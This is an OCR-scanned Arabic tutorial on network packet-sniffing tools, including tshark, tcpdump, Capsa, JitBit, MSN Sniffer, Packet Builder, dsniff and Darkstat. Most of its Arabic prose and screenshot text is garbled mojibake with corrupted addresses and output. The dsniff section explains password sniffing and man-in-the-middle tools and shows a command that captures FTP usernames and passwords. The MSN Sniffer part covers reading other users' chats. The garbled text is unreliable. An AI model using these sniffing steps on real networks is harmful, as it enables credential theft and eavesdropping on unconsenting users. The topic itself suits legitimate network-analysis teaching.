jl iajj^ AiLiaU ^ia ^Uj^j ^IaxJI lJIIj) ^ljLaj V <jl£ lil .Ctrl + C ^l.^ nub Uj^j iali^VI aAac lJIsj) ^HiJ ^ 
.ILLoj Ajc Uj^j Ia£ -a t° u^ 3 ^ ^—^j ^ ^ (j^l^JI Tshark j-^VI 



:\tri«s-seii*rai>«hirfc ~ii -f "dst pert so and host *4.«.i7a.320 ■ -t fluids 
-e f ran*. rnj rT*e r -e ^p.src -e ip.dsc -« tcp. iv«ndow_«i2* 



?4,6.173.?20 

•2 6, 173. 220 

3 34.4,173.220 

4 34,4.173.520 

5 34.6.173.220 
t 34.4.173.220 
?7 34.4.173.320 
58 34,4.173.520 
S 31,4,173.220 

10 34.6,173.220 

11 24.4,173.220 
13 34,4.173.520 

13 34.4.173.220 

14 34,4.173.220 
C ; \ traf e S'seri era! > 



174,137. 42. 7S 
174.137,42.75 
174. 137. 42. 7? 
174. 137. -12. 7S 
174.137.42. 7% 
174. 137. 42. 7S 
205 r 2 51, 215.133 9lt2 
174.137.42.75 6S700 
174.137.42.75 S152 
205.. 251. 215. 133 65700 
174,137.42.75 657O0 
174.137.42. 7% 
174.137.42. 75 
174. 137. 42. 7S 



S192 
&S700 
65700 
65700 
&10Z 
31*2 



6S700 
657O0 
65700 
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-E header=y 4 JliJI Jc J <J$^ cjU jlx^lt J*^J -E J^l^l/jU^JI - iki^ 

.Jj^al J jj^aLd Ia jj l gaj ^jl! CjU* jlstxJI ^l^cV t-E separator=, ^ ? i^JLudj dAjLu J cjL* jlx^l! Jj^*^ 

.stats.txt ^ ii^J j^Vl J > stats.txt ^l^luil 

(jjj^JI iSj* cjUjL^I jja^) Export Traffic Statistics • 

lP 3 j*i 'tshark -qz io,phs 4 *j > ^ t lia^U Jtill JiSill J J^ .3^0 Jc- jUaj t> Tshark 

.(phs) J j^jj^ yr* J$^' JjuoLodl cjUjL^J 



L~T T^Z^^^ 

C:\traces-generat:>tshark -qz id.phs 

Capturing on Aealtek PCEe F£ Family controller 

153&7 pac^ots captured 



Protocol Hierarchy Statistics 
Filter: 

frame 
eth 
arp 
ipv6 

UASip 

tcp.se $J«rtt& 

1c«pv& 
udp 
dh<pV6 

ip 

udp 
snmp- 
bootp 
dns 

db- 1 sp-di sc 
hxtp 
tcp 
http 
da.ta.-te-xt-'hnes 
tcp , stents 
image-oif 
media 

tcp, segments 

data 

tffrl 
ft? 

ftp-data 
db-1 sp 
db-Up 



fraws 
f rases 
frares 
frires 
fratrtes 
ffasaes 
frauds 
frawes 

frame* 
fr3L!r* 5 

frames 
frames 
frames 
frames 
frj.r-.es. 
frames 
frafaes 
frames 
frames 
frames 
fra»es 
frames 
frames 
frames 
frames 
frames 
f rare s 
frames 
frames 
frames 
frirei 



IS 367 bytes: 15104271 
15367 bytes: 15104271 
4B6 bytes: 29160 
li33S bytes :l 377 S476 
13310 bytes; 137725-30 

bytes Mosies 

15 bytes; 12*29 
15 bytes: 12629 

:24 bytes 12332 
1 byte i: 114 

1 byte&:114 

1546 bytes: 1299635 
56 bytes: a 719 

2 t?vtes: 240 
5 byte &: 1710 
3^ bytes: 4 351 
9 bytes:l3$e 
fi bytesLioso 

1490 bytes; 1290916 
12 bytes:*425 
2 bjtes:*4a 

1 bytCS;£2S 
;2 bytes: 734 
1 byt*s:799 

1 bytes: 799 

2 bytes:lSll 
4 bytes:l3S7 

:Sl bytes : 4(544 
BOO bytes: lid95 13 

3 byte&L4D0 
3 bytes^oq 



C:\1.races-5ertf ral> 



> c> V^j » ^^kl^j 4JUJ! ^ ^ jSlj iCjIpL-fl^yi jl j^VI tdji^j <j| dii^ . tshark -qz io,phs > stats.txt' 

.<iaj^3l j jiijjaJ i ^Ujla 1 j^JjujV cillij tshark -qz hosts 



C:\traceS-generaVs>tsharl; -qz hdsts 
ciptuinig on Realtek PCEe fc Family controller 
il&l packets captured 

* TSiiark hosts outpm 

* Host ^aca <mher<d f rorr. t ; \u se r s\ Lam- a Vppt>ata\Locai \Teap-\wi r*srvar k.6t 79 pec 

0-F F79-49 70 -9SE4 - 66F F3OQ*M»F_ZH210£U9 351 2_al206fl 



2LG.34.1S1.60 
74.125,129-. 95 
18^,35.99,17? 
74. 125. 22^.60 
74.125.2Z-?. 59 
74.125.2;? -3. 107 
74. 125-224. 10€ 
74.125-224.103 
74.12S.2J4.91 
74.125,224.92 

r _.SS.5t> 
74. 125. II*. 121 
19S.66\239.14& 
26&7:fSbO:4Me:cO?: ; Ef 
2001 : 4660 : 4Ml 1 SAO : : 100c 
ent. cob 

26&7:fSbO:400e;cOO: s 79 
C: \ traces-gene ral» 



: 64. 145,, 8 
64.145. S 



sou reef orge.net 
g-scral eapi s . 1 . goo^l e . com 
e472 - g . akamai edge . net 
dart , 1 . doubl eclnck.net 
dart . 1 . doubl eel ick.net 
google hosted. 1 - googTeusercontent. com 
googl eHosted . 1 . googTeirsercontent.^ora 
google^osiad . 1 . googl eusercpntent . con 
so- jffldn-ne t . 1 , goog To , co« 
so- 2»dn -ne t . 1 . flocfl'Fo . own 
41294 . tv20 , a^amal , oe t 
41294, w20.afc.ai*.ai .-net 
4 1294 , w20 . akai*ai fie t 
flhs.l .gOoglc.corr. 
vrNVf . chspoe llu. com 
googl eapi s . 1 . googl e . com 

goog ~i eh uste d . 1 , goog 1 eu se r-cont 

gits. 1 i google . con 



^ijjuj ^Jc. .-r J^J^ ^1 iklujl J ^Uij 4^ ja. L Expert ^UaaVlj 4djUaa.^LJl 4dj|jJ^ajll ^Ijalojl ^ lij 

^>JI jl^a fjjA tshark -r M http-downloadl01.pcapng M -qz expert,notes j^VI JU3I J£^3I 4 JUJI 

.-qz expert, warn 3 *j » ^ t ^^kiujla 4CjI jjI^jIIj ^IkkVl Jaaa li] .^ssll t_aL ^ zero window ^ 
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\ira«s-s*fleralMi^ari( -r "http-down eatflOi , p* apog" -qz exptrt, notes 
warns C10«) 

Pn>t«e1 Summary 

TCP Previous scgnrat not <aj>tu 



Presidency Group 

100 sequence 

fed (coamon at capture start) 

J Sequence 

7 Sequence 

note* goos) 

Frequency 

61 
S9 

S3 



Group 
Sequence 
Sequence 
Sequence 
Sequence 
Sequence 
sequence 



TCP winqw 1* full 

TCP 2ere winds* 



Pro-toed Summary 

TCP explicate AC* <*4) 

TCP Duplicate AC* C*2> 

tcp Duplicate ack 



tcp Duplicate ack 
TCP Duplicate ack 
TCP Duplicate ACK 



http://www.wireshark.org/docs/man-pages/tshark.html -M s j^u u^j -z jo CjU jkJI ±y*l 

Export HTTP Host Field Values • 
L_kL CjU jkJI ^ hg^ j 4<>y*\\ ^ U3U. ^ jj ^ill j HTTP ^^aJl J ji^ ^ 3il£ JalSjlV Tshark v^»»il <J » ^ ^ 
* http.host ^^4? £ (J\ a^VW .http.host ^ y?^ jW^V lP 3 ^ <^ <^ 

.^U3I J£^3I U£ JIUI Jc -gr^ c^! j exported field name 



-i 



C;\irace_files-pcapn^>iinarlK -14 -ft "mtf.h«t" -T ftelda -e http. host 

Cipiuring on fte^Vrafe pcie F£ Family Ooncreller 
■30* puckers captured 

C: \tr5ce_f-nes-peapngy_ 



jjc. fc»Q^ (JlaJ <J-gIjlx» AiLjaj \ ij£ '<^-Mt <J£juJI J 6L_flJjJaxJl HTTP (J ^ ^ - ^ill L_flLJl ^uiaJJ 

.(ip.dst) ^jJI IP 



I httphosif .tart ■ No;cp>n 



File LdiC Format View Kelp 



z. cdn. tumtr, com 
cache- Q2 , c 1 * anpr 1 nt , rm 
tache-Q2. clearer i nt, riei 
1 2 . ctfn. tur rter . com 
ads. con, com 

1 2 , cdn. tur ner . -com 
i £ . cdn. tur ner . -com 

13, ttfn. turner, ton 
<z, ttfrt r turner. ton 

page a-d z. goc-Q 1 e synd f car i on. 

1 2 . cdn. tur ner . com 

c.c.s-. cfrn, com 

i 2 , cdfi. tyr ner . com 

i3- cdn. turner . com 

12. tdrr. turner.com 
i 2 . cdr*. tur ner ■ cora 



.^3 jA\ liA ^ <^ jaJI c_ii^3l ^> o j c_jt&3! li^S cjX^JI ^3!^ j http ://www . wiresharkbook. com/ * jj ^ 
CjI jlkk] (/ Sl3l i-^lSll ( jixj-ciljUi J j| jll ^ J j » ^ti J j-> .. nH http : //www . wireshark. or g/ ^ 

. Jj^Iill o^J^. (iljLujjjIj 3 a 1 nJ j S uaJ 

.UU^» dia j^VI ^ t*S jLS jj! jll djl^l ^ 4£ jUl^ll http ://www . chappellu . com/ ^JjW^V^ s ^ jl^>VI 

.Filter Expression jUJj 'l^j^^ j^j ^ V^?^ o^j^ j^-^j Ait^aj-j tiljUijjl jl! j^j- <L^a! 

.cilljja 4^ jui cJ^laj (jtn^j 
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Sniffing Tool: Tcpdump/Windump 



Tcpdump *t 

http : //www . tcpdump . org : j^-a^ll 

j£\ ^ jaJI j TCP/IP f d^jf- j jj&V t*U sbVl ^ .^>JI J^I ^^klaij ja\ jVl j^joj si J ^ Tcpdump 

.(_£^)^.VI UNIX lS^*-^! 4_xJaj|j (JJdSill ^^^ic (JasU .(JIj^jI <Sjjui 1^_IL£LujI jl IgJUjI ^JJ 

Windump ^ 

http : //www . winpcap . org 

JjiiJiill ^Uail a£jJo3I JjWil ^*l jl jiajoa sbl j t jjiLj ^t_uu3I ^Uail ^aj^a^ \ $ Tcpdump Cy* ^ ^ udj c _^& Windump 

^jjoij Uj£j o.Vqt ^c-l jlll liflj ^ajlll <SjjoJ| JjJ-a 4-S^> U '**J &-^U1a3 ^I^JjujI (jS-aJ .^ajl L>^J^ 

. Jj^jj ^LJajl ^ Jaxj <j| VI Tcpdump <^ s^j* ^ US L_ajl!a jll 



TCPDump 

Runs on Linux and UNIX systems 



WinDump 

Runs on Windows systems 



Command Prompt 



O LMI ini)l lD.Tf 31 U.i»iti > BIFJ 

■RHI HIMiT BT mtn : UM 

11 11:41. «■]*< IQ.Tfl 21.21 ? 19.19.31.13: La 



11 H;W lllin ;; > UII ; :1 ; ttm ; 11 1 L*v4 fcri fHi n 1*1; «fc» to 
t*l* : 

UiUill llATl £■*■ 911 ; Ml; HI-; 11 I- HFrt-il lii «. ta B» ; i wj l 

Mtll M 

lM|:» Htl« ; ; > *H*;:1;*0M;14; — i p m — -*If !■ 

f Jll" ; 

li:|f:tl.l7WLl f .H 2. f : £.0* : 1*0 : H * i^rf-iilmtui H^: 

mhi -hi 

11:11:11 iU31± 10.21 21 »Dtii > BIES. 
HOIH lOfT BT intxi HlPrt 

13 11:11 11 1»H 10.21 21 .21 > ID .201. 21 . SG : i^: 
13 L,4: 20 (21746 lfl"« U iLfiW lu N 



,i 
i 



hrtp.-//w*w. tcpdump. org 



i4> tajLHtu. - mm M-i iH* WC«iJ7»mj 



» IP tmt* im *J| 

Tpjf7T' : -.1 Cpr -!-. -■.JL"! ■-UJL.'.Jh - l>: 7|";J I .U»; .£ir|rt wi1i t iT 

}::C5 ^.40jMj it »n.t,>ti3+tp> , ^1 KllT IBli+p^Mu^j 

n:M M.:.r:;w ire - rr i.': .LiJ t ii>'i iitcpa talicit 



HTIf^ldlK, Jehu ■nhk.MQMUtMH, laiUtM 1? 



JJill H.HMU IW »Jf- L>C»M>fl3-0H • ffDJi ll I T f\ 



iliTl*:* 
Cti II 

in 

lliSI M.IHl'J J'C -if- "::cll, *--lL - „ih - , 3 ^ Dn [V i j.i»M. 

an«rris«Hn. in is ■UN-ucpJhftiftb'i, Iitop> 32 

#]!H.34.«IW«» If UKMMP!IV.4Hn * IHiAIK £M. ]}]>! I 



frffp :// www. wmpcap.org 



Packet Sniffing Tool: Capsa Network Analyzer 



http://www.colasoft.com : j^-a-JI 

aj^jojIj <c a 44£jJo3I jic* aIuj^JI cAiUJ! Ja£iti ^^illj a£jJo3I <jSI^<J obi c _^a Capsa Network Analyzer 
US ,a£jjoJI j (j)) i"u^ ^^ill <ISjouJI c si ujSj > >il j (JjlaJi] ^LqIa^LujI ^jj (^^^ .A^UJI ^ jjuj^>3I j ^^A 3 ^ ^1 ^— jUUa^j 

til^cUj -c ^jlati3l jjif^JI (j^j^ ^ j t^^JI jjq ujj tila t^^alxi <J jS j!i (JjI^j ^aSjjoJI ^^ic l^j ^jjj ^ ^^cjjoJI c . ^.bl ^^ic Sj^lS l^Jl 

.^^IuloJI iLuiil ^ ^j^l ^ sniffing J^*i SbSfl oiA ^lilluul ££aj 

;ljIjj^I 

802.11a/b/g/n 

.CjV jS jJj^)JI ^jjjUjI ^^ic ASjjuJI CjllulaJ ^jc !^jJa3 ;<Sjjuo3I CjV jS jJj^>J 300 L>^ jffi cJ^^J \. v> ^^ 

^j^j j a£^JI jSiJI djUlnll ^ja. JalSjll Jila. ^ ^l^kloaVI j (Network Bandwidth) c5^^>i3l jUaill 

_^^aJl oi^ (J ^a. CjU jIslxJI tila j (j^akla 
,<SjjaJl ~\ iklLujI CjUU jjjuafljj ialilill j^juj ^ilj U>* ;*D^a.lj 4 a ASjjoJI dlljjUaal ^jiajc 
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# a£jjuo3I (J^Lk ^j-<» ^yii ^j3I jj^>^ ^^>^j 

<^^j ^ Ij* cf^* ^j'-O^ f tciujiuli ^jUtj (j^aLkJ! wizard ^W-^ <J^-^> j^^-o^ ciuinj ^ j£j 

.aJUII aJL!£\ jj^i 



Colasoft Capsa 7 Enterprise Demo 



< j Home Page «. j Forum <^_) About 



,y Help 




Name | IP 


PPS 


bps 


Speed 


Packets 


Bytes 


| Utilization 


Not selected 


Q Local Network Adapter(s) 






54.00 Mbps 
72.00 Mbps 
10.00 Mbps 
1 QOOjOO Mbps 




0.00 B 
181.62 MB 
DjOO B 
0.00 B 


0.00% 
1.08% 
0.00% 
0.00% 


Network Profile 


□ Microsoft 0.0.0.0 

□ Wi-Fi 192.168.1.101 
O Local Area Connection 0.0.0.0 

□ Ethernet 0.0.0.0 


0 

168 
0 

: 


0.000 bps 
780.696 Kbps 

bps 

O.C'OC bps 


0 

360549 
0 

: 


Not selected 

Analysis Profile 

Full Analysis: 




Set Network Profile 



Provides comprehensive analysis of all 
application and network problems. 

Analysis modules loaded: 
MSN 

Yahoo Messenger 

ICQ 

ARP 

DNS 

Email 

FTP 

HTTP 

ICMPv4 

Packet Filter 

No filter applied, all traffic will be captured. 



m 



$ & & 



Data Storage: 

Packet output disabled 

Log output disabled 



Full Analysis Traffic Monitor Security Analysis HTTP Analysis Email Analysis DNS Analysis FTP Analysis IM Analysis 



L_a UIHg Start c3j^ -LlillVI 4j\a* } ^ jiiwj ^y* j a^u'^W jllkj ajjouj^)]! *L!>iLuJI <j!>tk ^ 

.Wi-Fi 

a!A£ djUi jlx-d cdilaxj (^jII j l& jjc. j a^UJI ^ ^jAxJI ^ji^i ^ill j a^L^ Start ^ 



Full Analysis 
"If Protocol Explorer (1) 
'Xb Physical Explorer (3) 
§3 IP Explorer (4) 



Analysis System 

s 



Analysis Project 1 - Colasoft Capsa 7 Enterprise Demo 



IH iafi _f\ 



Adapter Start Stop 

Capture 
Node Explorer 
<A1 



ork Profile Settings 



Analysis Profile Settings 




Utilization (0%) 



x [Summary PDiagnosis ^Protocol f Physical Endpoint \\9 Endpoint ^Physical Conversation |"7p Conversation "[TCP Cc <1;q]| 



Traffic Chart(bps) Pack 

Online Resource 



D LB CS 



Total Traffic by Bytes 



118.43 KB 
94.74 KB 
71.06 KB 
47.37 KB 
23.69 KB 
0.00 B 




03:03:16 03:03:26 03:03:36 03:03:46 03:03:56 03:04:06 03:04:16 



Top IP Total Traffic by Bytes 



Top Application Protocols by Bytes 




5.03 MB 
4.02 MB 
3.02 MB 
2.01 MB 
1.01 MB 
0.00 B 

4*' 































:H 




























L 



























Live Demo 

Find Top Talkers in Net/vork 
J Who Is Using Network Bandwidth? 
5 How to Detect ARP Attacks 

How to Detect Net-A'ork Loop 

How to Monitor IM Message 

[ More Videos... ] 

How-To's 

KI How to Monitor Network Traffic 
Monitor Employees Website 
Visits 

| B I cannot capture ALL traffic, 
why? 

S3 Create Traffic Utilization Chart 
LSI [Ent]Start a Wireless Capture 
[ More in Knowledgebase... ] 







E 


Don't Know 
How to Use Capsa? 



> Capture- Full Analysis U*Wi-Fi f Inactive 00:01:26 ^?13,479 ^0 Ready 



https://www.facebook.com/tibea2004 



Jui tdiat j^JIj ^jll c> ^jaxJ! ^ljViTj Dashboard * ^ 
a£^1\ jj ja a£ j^. lS^> oaaift ^-2 jjoj Summary ^ <^ 

ajjj <>j * jaJt 11a ^ .c>»VI c5 j :ijaui j jj^ j cs Diagnosis * 



a&jaz^ ^j^j ^13! j .Transport Layer ^ TCP Slow Response <j> j^L? ^ 'TCP ^Ui^l ^ ^jj 3 



Node Explorer 

^ 4 «9 -fr. ^ 

Full Analysis 

TT Protocol Explorer (1) 
1® Physical Explorer (3) 
§fe IP Explorer (4) 



Analysis Project 1 - Colasoft Capsa 7 Enterprise Demo 



Analysis System 

► m £ 



Adapter Start 



Capture 



General Node Name Alan 
Group Table 
Network Profile Settings 



Analysis Diagnosis View Packet Packet Packet 
Object Display Buffer Filter Output 

Analysis Profile Settings 




Utilization (0%) 



pps (171) 



Traffic Chart(bps) 



/* Dashboard PSummary ' Diagnosis X [^Protocol PPhysical Endpoint |^IP Endpoint PPhysical Conversation P Conversation pTCR_;^J| ^ ^ Online Resource 

Events Addresses 

^ ^Sl -SjL flS. C ~ | RJAnaiyasXDiagnosticltem; | 8 | -fl & ^5" C " ^ 



Name 

All Diagnosis 
Q Application Layer 

-V HTTP Client Error 
H Transport Layer 

V TCP Repeated Coi 

V TCP Slow R 
B Network Layer 



© IP Too Low TTL 



Name 

192.168.1.101 

124.120.0.97 

197.200.77.165 

193.84.251.194 

61.6.21S.1S 

183.89.144.251 

74.97.30.120 

87.113.115.210 

177.94.160.24 

113.?f)3.??1.61 



MAC Address 
00:16:EA:DA.B0:B8 

CO:4A:00:C6:AO:CO 
C0:4A:00:C6:A0:C0 
C0:4A:00:C6:A0:C0 
C0:4A:00:C6:A0:C0 
C0:4A:00:C6:A0:C0 
C0:4A:00:C6:A0:C0 
C0:4A:00:C6:A0:C0 
C0:4A:00:C6:A0:C0 
rf>4A:00;rfitA0:r0 



IP Address 
192.168.1.101 

124.120.0.97 

197.200.77.165 

198.84.251.194 

61.6.218.18 

183.89.144.251 

74.97.30.120 

87.113.115.210 

177.94.160.24 

113.?03.??1.61 



Details 



| 192.1 68.1.1 01 \Petaits: | 



Severity 


Type 




Event Summary 


Source IP A 




Fault 


Transport 


Repeated attempt to establish TCP connection 


(see packet 922). 


192.168.1 


V 


Fault 


Transport 


Repeated attempt to establish TCP connection 


(see packet 2776). 


182.182.6 




Fault 


Transport 


Repeated attempt to establish TCP connection 


(see packet 3557). 


184.17.19 


* 


Fault 


Transport 


Repeated attempt to establish TCP connection 


(see packet 3830). 


87.56.213 




Fault 


Transport 


Repeated attempt to establish TCP connection 


(see packet 5612). 


109.64.11 




Fault 


Transport 


Repeated attempt to establish TCP connection 


(see packet 5957). 


37.239.79 




Fault 


Transport 


Repeated attempt to establish TCP connection 


(see packet 6434). 


114.179.1 


¥ 


Fault 


Transport 


Repeated attempt to establish TCP connection 


(see packet 6766). 


118.200.1 




Fault 


Transport 


Repeated attempt to establish TCP connection 


(see packet 10349). 


71.180.23- 


o» 


FaiJT 


Tiatisnort 


RpnMtpH attpmnt tn pctahlkh TCP rnnnprtinn 


narlrpt 105141. 


71.1R0.P3. v 
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Live Demo 



Find Top Talkers in Net.vork 
^S) Who Is Using Net.vork Bandwidth? 
J How to Detect ARP Attacks 
Jpf\ How to Detect Network Loop 
Jj How to Monitor IM Message 

[ More Videos... ] 



How-To's 



Lj3 How to Monitor Network Traffic 
. B Monitor Employees Website 
Visits 

J I cannot capture ALL traffic. 

Create Traffic Utilization Chart 
. J [Ent]Start a Wireless Capture 
[ More in Knowledgebase... ] 




Support Forui 



^Capture - Full Analysis 



1 Wi-Fi f Inactive 00:03:35 ^34,891 0 0 Ready 



I jlij i 

' | Analysis | System Tools Views 
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► H 



Adapter Start Stop 
Capture 

Node Explorer 



Full Analysis 

ffl IT Protocol Explorer (1) 
® ^ Physical Explorer (3) 
ffl §b IP Explorer (4) 




Details - Packets 



Absolute Time 

03:06:22.231636 
03:06:22.231717 
03:06:22.231794 
03:06:22.252997 
03:06:22.253352 
03:06:22.259968 
03:06:22.260119 
03:06:22.262888 



50.113.1.194:46387 

124.6.181.176:47572 

192.168.1.101:40153 

184.64.191.189:28159 

192.168.1.101:40153 

184.64.191.189:28159 

192.163.1.101:40153 

192.168.1.101:7521 



Destination 
192.168.1.101:40153 
192.168.1.101:40153 
124.6.181.176:47572 
192.168.1.101:40153 
184.64.191.189:28159 
192.168.1.101:40153 
| 1 84.64.191.189:28159 
6.70.34.117:80 



Protocol 

TCP 
TCP 
TCP 
UDP 
UDP 
UDP 
UDP 



Size Decode 

159 Packet Number=29,489 

64 Packet Number=29,490 

58 Packet Number=29,491 

1,484 Packet Number=29,492 

66 Packet Number= 29,493 

1,484 Packet Number=29,494 
66 =29,495 

70 Packet Numb er=29,496 



B-TT Packet Info: 

fjfj Number: 
<=P> Packet Length: 
<#> Capture Length: 
■fjfj Timestamp: 
- T Ethernet Type II 

^Destination Address: 
E& Source Address: 



"C 

6 6 

2014/07/23 03:06:22.262888 

[0/14] 

C0:4A:00:C6:A0:C0 [0/6] 

00:16:EA:DA:B0:B8 (Intel Corporation) [6/6 



0 0 00 
001F 
3031 



CO 4A 00 C6 AO CO 00 16 EA DA B0 B8 08 00 45 00 00 34 €D 63 40 00 80 06 66 98 CO A8 01 65 42 
46 22 75 ID 61 00 SO 4C 49 4C 32 00 00 00 00 80 02 20 00 72 IB 00 00 02 04 OS B4 01 03 03 08 
01 01 04 02 




tor Network Traffic 
>k>yees Website 

iture ALL traffic, 

ic Utilization Chart 
Wireless Capture 
>wledgebase... ] 





I 


Fault 


Transport 


Repeated attempt to establish TCP connection (see packet 29496). 


192.168.1 










Fault 


Transport 


Repeated attempt to establish TCP connection (see packet 29510). 


192.160.1 


wo mm 

1 ■ j 










Fault 


Transport 


Repeated attempt to establish TCP connection (see packet 32457). 


192.168.1 










Fault 


Transport 


Repeated attempt to establish TCP connection (see packet 32911). 


192.168.1 












Fault 


Transport 


Repeated attempt to establish TCP connection (see packet 33488). 


192.168.1 








V 




V 




< 








> 







gKapture- Full Analysis m»Wi-Fi f Inactive 00:03:35 ^34,891 ^00 Ready 



J\ Alarm Explorer 0 
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bps 






8 TIP 


17 77 MB 


,.; 
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a X tcp 




14.MMR 


.••6.661 


R40.?16 Khpc 










T 


12.91 MR 


21,4*0 


602184 Kbps 










T MTTPS 


228.07 KB 


6-16 


0.000 bps 










T HTTP 


1.53 MB 


2.545 


237.832 Kbps 








•' 


r H MP 




17.06 KR 




t. 248 Kbps 












7.6» KH 




6?4UXXlbps 










T 


t.37KB 




6Z4.000 bps 






a TuoP 




3.10 MB 


8.01 1 


94.232 Kbps 






T Other 
« Tons 




V04 MR 

10.01 KB 


7.767 

79 


o.rxx) 


ops 

bps 






TOu««y 


3.33 KB 


«J_ 


a ooo bps 
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ft v h r 
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n fYVi 
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« All 






• 




Kyle. 


Packets 


Bytes Krrrrvrd 


Parirets Kec rr 




t 


• ^ Local Host 




■ MO 


34 


16.35 M0 


re 






B C3? 00-.I6:CA.DABO:B8 




17.70 MB 


34.425 


16.35 MB 




17.6 




•S3 19.M6B.1.101 


17.68 MB 




16.« MB 




17.6 






Ca4A=t»:C6<AO:C0 


1 /.to* MR 


J4.J75 


1.92 MB 




lb./ 


55 19M68.1. 1 


MM tea 


239 


8.27 KB 






£ 19 0OI3:r7:SC:83:A7 


90.19 KB 




593.00 6 
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Log Log 
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User Hidden Nodes (0) 
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« 
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n: 
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Piotocol 


Stawwwy 
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DNS 
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Network Packet Analyzer: JitBit Network Sniffer 



http://www.iitbit.com : j^-a-JI 

.IP p y± ^jjj j tAi ^im^ l <1l^3I cill ^joij a<^\ ru^<\\\ sbl j& JitBit Network Sniffer 

^■.rt-uij ,IP (JjjIj dalij^ai laa j ^3^^ lW^j .^^ImiV <J jl NIC IP o^^J^^ J <Jj> * ^ 
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500 0063 0626 0000 8011 2*09 0AO0 Q 805 
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CGOO 0001 0000 0000 20J3 t^i #141 11 41 
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Chat Message Sniffer: MSN Sniffer 2 



http://www.msnsniffer.com : j^iJI 
fjaij jj s AilS MSN £AA\>a laSsL 4Jli . JJ^ sbtj j^l MSN i^U&V sbi MSN Sniffer 2 

Ai^jjoixJI a£jJo3I j jj c£' cs-^* l_u£jj .chat history file ^ SjjjujLJI <JjLujj lS^ lsj^ 

ja! ^\ MSN ^J^J^l J^J la^j] i 

n 



View Sniffer Help 



(A 

Report 



Help About Register 



Bl- ^a ioe 210 



VAViLMa — the Windows L i v ■ 
J*-;, GeorgeBlue.; WiLMa — the 
GeorgeBlue 

J* 1 ;. joe 210j WiLM-a — the Win 



5^ 

■I 



■ > I 



MSN packets: 
Local users : 
Conversations: 
Messages : 



System -- Rri H .=. ■-■ 2 4 O O : 5 3 : O O 2 O O fa : 

MovieScout £ ;j has joined the conversation, 

joe 2 IL D -- Rri N .=. ■-■ 2 4 00:53:00 2 0 O fa : J£j 

test 

r-1 ■-■ i ~ S .= ■=■ C j -- Rri N ■-■ 24 O O : 5 3 : o o 200& : 

Welcome heck. 

1 "Type "movies" to see the movies near you 

2 "Type "genre" to search for movies by genre 

3 "Type "zrip" to change the location of your search 

joe 210 -- Rri M .=. ■-■ 2 4 00:53:00 2 00fa : 
1 

r-.l .=. ... i .== S .= .=. ■_!+: r; j -- Rri M .=. ■-■ 24 00:53:00 2 O O fa : 

Movies playing in or near Los Angeles, CA, (90001) on VA o n id a y .. 
INIovember 20th: 

1 Happy Feet [ P G ] 

2 Casino Roy ale [ P G 1 3 ] 

3 "The Santa Clause 3: "The Escape Clause [G] 
■4- Flushed Away [PC] 

-B Borat [R] 

F. Stranger Than Fiction [PC 13] 



Type 

5 e 210 



Tore" for the next set of results. 

- Rri M .=. ■-■ 24 00:53:00 200fa : 



■_!+: C ■ - j -- Rri M .=. ■-■ 24 00:53:00 200fa : 

lovie "Casino Roy ale" is playing at the following theaters in or 



Tcp/Ip Packet Crafter: Colasoft Packet Builder 



http : //www .colas of t. com : j^-a^ll 

4£f^3l f» *1£>V <ul.ikU >J! Jja*j3 sbl J jaJl J j* network packet crafter yr* Colasoft Packet Builder 

^ decoding editor ^ a ^ ^j^l J!^lk cjU^JI ^jja tiL <j^aLaJ l jUlkV sbVI 

'TCP (O^ 'IP f <ARP f s^ljSJI i> ^ «j .iSijill ^ja. ^ jj*^ Jj^jjjjj Jjia. ^jS jjj^j] 

e >Jl ^^laJ UDP ^> j 



File Ed* 5eod Help- 

tfd ^ I (d 

Import Eitpo*" Add Instit L^py 
•Qi* Decode E<M»r 



at In To i 
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Network Sniffing Tools: dsniff 



http://www.monkey.org/~dugsong/dsniff : ja^JI 
jjja lSJ^j (Password Sniffing) £A*1£ c^aSM cjIj^Vi <> t> ^jW^ Dsniff 

<filesnarf 'dsniff lU^ ^Ij .31^1 cjli CjUjkJ! g-lja^Jj I Wv* *\ \ cA *\\U\\ \ cjVjSjjjjj (Network analyzer) 
jjjjjj j^ji cjUK) Ji* (Passively)^^^ ^jjUI a<^1\ cjUU> WebSpyj <urlsnarf <msgsnarf mailsnarf 
C5^) Sjajia jjc. a£j^31 jj^ a£j^ ^Ijj^I macofj 'dnsspoof <arpspoof ^CjULJIj t^jjjSiyi 

(Actively) (MITM) < « > ^n^ l J^j iiiil webmitmj sshmitm (layer-2 switching < c-W^ 

J i^jJl cALUs jV! J^U (HTTPS sessions) HTTPS^^ j (redirected SSH) ^ SSH ^ 

ad-hoc PKI 

'SMTP ^Telnet ,FTP ^VjSjSjjJI ^bu tf illj (Password Sniffing) jjj-JI c> > Dsniff 

'NFS PPTP MS-CHAP OSPF 'RIP 'Rlogin 'LDAP 'SNMP 'IMAP 'NNTP 'poppass 'POP 'HTTP 
Citrix 'Meeting Maker 'PostgreSQL 'Napster 'ICQ 'AIM 'IRC 'CVS 'Xll 'SOCKS 'YP/NIS 'VRRP 
. Microsoft SQLj Sybase ,Oracle SQL*Net 'Microsoft SMB 'NAI Sniffer 'Symantec pcAnywhere 'ICA 
Berkeley DB tjJ u1 ^ ~ iklujjj t^Uu^^l! SjAall CjtlJI .kaa Jai^jj t J j£ jjjjJI ciAiLnkj J£3 JJ^illj ( jo Ujliti c aJ&lb ^ j£j Dsniff 
.libnids c> TCP/IP reassembly j^jj ^ .W^>> i> ^U-aJI CjVjU^ .Lia tgSUll c_aLU (j jj . nVK 

#dsniff [-c] [-d] [-m] [-n] [-i interface I -p pcapfile] [-s snaplen] [-f services] [-t trigger [,...]]] [-rl-w savefile] 
[expression] 

iLd^klauJI Cj^^LilsLxJI ^-i^ q^jxI tilli j dsniff -h ji*>>^l <c.Uia <A& aj sbVI J-*c IaJ j JjxjuHH ^Uaj ^^ic Sjfl jld staVI 

:^UJ! j&\ P U^L ^l^ll jt** J dsniff ^ 

#dsniff -i ethO -m 

■ Jj^jj^ y?^^ o^f^ -m .ethO j ^.^lou dsniff J*^> -i ethO 

idsniff > gyL 

dsniff: listening on ethO 



20/08/13 18:54:53 tcp 192.168.2.20.36761 -> 192.168.2.22.21 (ftp) 
USER user 
PASS userOl 

.dsniff l^Hill FTP ^ Cik^ JL^j^U JJ>( J! ^Kj r 



Packet Sniffer Tools: Darkstat 



http://unix41yfe.org/darkstat :j^JI 

t*ll l^^j iA<^\ djUl^kioil J CjUjL^VI jji J£ t^iLkJI ^ J^su ^ill j Packet Sniffer ^ Darkstat 
